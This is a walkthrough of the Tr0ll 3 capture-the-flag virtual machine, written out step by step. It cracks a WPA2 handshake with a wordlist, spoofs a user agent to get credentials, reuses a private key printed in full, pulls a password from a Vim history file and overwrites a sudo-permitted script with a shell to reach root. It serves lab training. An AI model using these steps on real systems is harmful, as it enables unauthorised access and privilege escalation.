Tr0ll 3 – Please don’t feed the Troll (Walkthrough)

This post is also available in:
Deutsch
The third episode of the Tr0ll series from @Maleus21 is a classic Boot-2-Root VM. Our goal is to move through different levels of users and finally gain root privileges to read the flag from /root/flag.txt
. The following writeup is the summary for my solution to achieve this goal.
Level 0: start
The login information for the first user start
with the password here
is displayed in the start screen after the virtual machine boots up.

An initial port scan using nmap
also shows that currently only SSH
is available on port 22. However, this at least allows us to work on the machine via our own host.
basto@Malice:~$ ssh start@192.168.56.101
start@192.168.56.101's password: here
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
start@Tr0ll3:~$
In the home directory of the user start
we find the two folders bluepill
and redpill
.
start@Tr0ll3:~$ ls -al *
bluepill:
total 12
drwxrwxr-x 2 start start 4096 Jun 18 2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start 18 Jun 17 2015 awesome_work
redpill:
total 12
drwxrwxr-x 2 start start 4096 Jun 17 2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start 17 Jun 17 2015 this_will_surely_work
The file awesome_work
contains nothing but the URL http://bfy.tw/ODa. If we visit the given link, we will be forwarded to www.lmgtfy.com (Let me Google that for you) with the query “How do you make a hacker waste time”. So it’s pretty obvious that this clue is a dead end and was placed there as a joke.
basto@Malice:~$ curl http://bfy.tw/ODa
<html><body>You are being <a href="http://www.lmgtfy.com/?q=how+do+you+make+a+hacker+waste+time%3F">redirected</a>.</body></html>%
As the story progresses, we are presented with similar information again and again, just to serve as a distraction. The machine lives up to its name and “trolls” us wherever it is possible.
The file this_will_surely_work
in the redpill
directory contains the string step2:Password1!
. Our instinct tells us that these have to be the next credentials. But if we try to log in with the given information, we only receive an error message. Yet again, this is only a decoy.
First Clues
With the command find / -type f -perm 0777 2>/dev/null
we can list files that can be read and edited by all users regardless of their owner. This allows us to identify the first actual clues:
start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null
/var/log/.dist-manage/wytshadow.cap
/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt
On the one hand, we can read the file wytshadow.cap
in the directory /var/log/.dist-manage/
. This appears to be a capture of network traffic including a WPA2 handshake.
start@Tr0ll3:~$ tcpdump -r /var/log/.dist-manage/wytshadow.cap
...
23:40:52.736808 Authentication (Open System)-1: Successful
23:40:52.742448 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown)
23:40:52.743986 Authentication (Open System)-2:
23:40:52.746024 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown)
23:40:52.748053 Assoc Response AID(1) : PRIVACY : Successful
23:40:52.750120 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown)
23:40:52.752176 EAPOL key (3) v2, len 95
23:40:52.753704 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown)
23:40:52.755752 EAPOL key (3) v1, len 117
23:40:52.757806 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown)
23:40:52.759857 EAPOL key (3) v2, len 151
The password of the user wytshadow
can probably be retrieved if we succeed in cracking the handshake.
The file gold_star.txt
in the directory /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/
on the other hand contains numerous 10-character strings and serves us as a dictionary in our attempt to recover the password.
aircrack-ng -w gold_star.txt wytshadow.cap

aircrack-ng
spits out the correct password gaUoCe34t1
in a couple of minutes and with the new credentials we can now login as the user wytshadow
:
start@Tr0ll3:~$ su wytshadow
Password: gaUoCe34t1
wytshadow@Tr0ll3:~$
Level 1: wytshadow
If we look through the home directory of wytshadow
, the file oohfun
immediately catches our attention. This file has the SUID bit set, which allows us to run the program with the permissions of the user genphlux
.
wytshadow@Tr0ll3:~$ ls -al
total 48
drwx------ 5 wytshadow wytshadow 4096 Aug 22 09:21 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw------- 1 wytshadow wytshadow 297 Aug 22 09:21 .bash_history
-rw-r--r-- 1 wytshadow wytshadow 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 wytshadow wytshadow 3637 Jun 17 2015 .bashrc
drwx------ 2 wytshadow wytshadow 4096 Jun 17 2015 .cache
drwx------ 3 wytshadow wytshadow 4096 Aug 1 01:50 .gnupg
drwxrwxr-x 3 wytshadow wytshadow 4096 Aug 22 06:40 .local
-rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 oohfun
-rw-r--r-- 1 wytshadow wytshadow 675 Jun 17 2015 .profile
However, when we actually run the oohfun
, we just keep getting the output iM Cr@zY L1k3 AAA LYNX
:
wytshadow@Tr0ll3:~$ ./oohfun
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX
...
If we examine the file content using strings
, we can see that it contains the following line:
/lol/bin/run.sh -b 0.0.0.0
Unfortunately, we can’t modify run.sh
, because the parent directory lol
is also owned by the user genphlux
.
wytshadow@Tr0ll3:~$ ls -al / | grep lol
drwsr-x--x 8 genphlux root 4096 May 22 2009 lol
In Linux, all commands that we can execute with root privileges can be listed with the command sudo -l
:
wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow:
Matching Defaults entries for wytshadow on Tr0ll3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wytshadow may run the following commands on Tr0ll3:
(root) /usr/sbin/service nginx start
We can see that the user wytshadow
is allowed to start the nginx web server service, which is what we are doing next:
wytshadow@Tr0ll3:~$ sudo service nginx start
Doing a local check of the open ports using netstat
confirms the successful start of the web server. We can now see the new service on port 8080.
wytshadow@Tr0ll3:~$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
However, we cannot visit the web service since all requests get rejected with a 403 Forbidden
error message.
basto@Malice:~$ curl 192.168.56.101:8080
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
To narrow down the problem, we open the file /etc/nginx/sites-ed/default
and take a look at the default configuration of the nginx web server. At the very beginning we notice the following block:
# Default server configuration
#
server {
listen 8080 default_server;
listen [::]:8080 default_server;
if ($http_user_agent !~ "Lynx*"){
return 403;
}
If requests do not include the user-agent Lynx
, the server will always respond with a 403 error. Since the file is unfortunately read-only, we cannot change the configuration. However, using curl we can append our own user-agent header in the expected format.
basto@Malice:~$ curl -H "User-Agent: Lynx Basto" 192.168.56.101:8080
genphlux:HF9nd0cR!
We can now use the credentials received in the response to log in as the user genphlux
.
wytshadow@Tr0ll3:~$ su genphlux
Password: HF9nd0cR!
genphlux@Tr0ll3:~$
Level 2: genphlux
As always, we first take a look at the home directory of the new user.
genphlux@Tr0ll3:~$ ls -al
total 52
drwx------ 5 genphlux genphlux 4096 Aug 22 10:09 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw------- 1 genphlux genphlux 273 Aug 22 10:09 .bash_history
-rw-r--r-- 1 genphlux genphlux 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 genphlux genphlux 3637 Jun 17 2015 .bashrc
drwx------ 2 genphlux genphlux 4096 Jun 17 2015 .cache
drwx------ 3 genphlux genphlux 4096 Aug 1 04:03 .gnupg
drwxrwxr-x 3 genphlux genphlux 4096 Aug 22 09:22 .local
-rw-rw-r-- 1 genphlux genphlux 1675 Jun 18 2015 maleus
-rw-r--r-- 1 genphlux genphlux 675 Jun 17 2015 .profile
-rw------- 1 genphlux genphlux 5649 Jun 17 2015 .viminfo
-rw-rw-r-- 1 genphlux genphlux 931 Aug 2 15:56 xlogin
The file xlogin
is just an HTML page that is a directory listing for the web directory /xlogin
, which does not help us in any way.
xlogin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /xlogin</title>
</head>
<body>
<h1>Index of /xlogin</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="maleus">maleus</a></td><td align="right">2015-06-18 00:27 </td><td align="right">1.6K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
On the contrary, the file maleus
is much more interesting. It appears to contain an RSA key, most likely to connect via SSH.
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----
Now we try to log in with the private key for the user maleus
. However, the SSH service prohibits us from using certificate files that have too broad permissions set. As a result, we have to first narrow down the file permissions in advance.
genphlux@Tr0ll3:~$ chmod 600 maleus
genphlux@Tr0ll3:~$ ssh -i maleus maleus@192.168.56.101
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
maleus@Tr0ll3:~$
Level 3.1: maleus (private key)
Since we do not yet have any knowledge of the actual password, we are currently unable to list the executable root commands using sudo -l
. However, there are already several files in the home directory that deserve our attention.
maleus@Tr0ll3:~$ ls -al
total 80
drwx------ 6 maleus maleus 4096 Dec 19 07:05 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw------- 1 maleus maleus 42 Dec 19 07:05 .bash_history
-rw-r--r-- 1 maleus maleus 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 maleus maleus 3637 Jun 17 2015 .bashrc
drwx------ 2 maleus maleus 4096 Jun 17 2015 .cache
-rwxrwxr-x 1 maleus maleus 37 Aug 22 10:04 dont_even_bother
drwx------ 3 maleus maleus 4096 Aug 1 03:48 .gnupg
-rw-rw-r-- 1 maleus maleus 145 Jun 18 2015 index.html
drwxrwxr-x 3 maleus maleus 4096 Aug 22 09:47 .local
-rw-r--r-- 1 maleus maleus 675 Jun 17 2015 .profile
drwx------ 2 maleus maleus 4096 Jun 18 2015 .ssh
-rw------- 1 maleus maleus 1301 Aug 2 16:02 .viminfo
-rw-rw-r-- 1 maleus maleus 931 Aug 22 09:55 xlogin
If we look at the source code of index.html
, it seems that the next clue is immediately revealed.
index.html
<html>
<body>
<img src="pic.jpg">
</body>
</html>
<!-- Wow, looking at the source code, you are truly l33t! The next step uses fido:x4tPl! >
Unfortunately, it’s not possible to login as the user fido
with the given password. It seems as if the troll has yet again played with our emotions.
Likewise, we get misled by the file dont_even_bother
. If we run it, we are prompted to enter a password.
maleus@Tr0ll3:~$ ./dont_even_bother
Enter the password :
Wrong Password
A quick look at the strings
contained in the file will reveal the required value:
maleus@Tr0ll3:~$ strings dont_even_bother
Enter the password :
xl8Fpx%6
maleus@Tr0ll3:~$ ./dont_even_bother
Enter the password : xl8Fpx%6
Correct Password
Your reward is just knowing you did it! :-P
So it looks like we still haven’t gotten anywhere with this user.
The file .viminfo
contains the history of commands that were typed in the Vim text editor. Among other things, this file also contains the following excerpt, which seems to include the input of a user password:
.viminfo
# Registers:
""1 LINE 0
passwd
"2 LINE 0
B^slc8I$
"3 LINE 0
passswd
Level 3.2: maleus (password)
If we now try to execute the command sudo -l
with the new-found password, we will get our next hint.
maleus@Tr0ll3:~$ sudo -l
[sudo] password for maleus:
Matching Defaults entries for maleus on Tr0ll3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User maleus may run the following commands on Tr0ll3:
(root) /home/maleus/dont_even_bother
As we can see, the user maleus
has the ability to execute the file /home/maleus/dont_even_bother
with the permissions of the root user.
We can’t do much with the current version of the file, but our user is permitted to modify it. Thus, we overwrite dont_even_bother
with the command to start a new shell.
maleus@Tr0ll3:~$ echo "bash" > dont_even_bother
Next we execute the overwritten code with sudo
permissions.
maleus@Tr0ll3:~$ sudo ./dont_even_bother
root@Tr0ll3:~# id
uid=0(root) gid=0(root) groups=0(root)
Level 4: root
As the final step we can now use our root privileges to read the contents of the flag:
root@Tr0ll3:~# cat /root/flag.txt
You are truly a Jedi!
Twitter Proof:
Pr00fThatTh3L33tHax0rG0tTheFl@g!!
@Maleus21

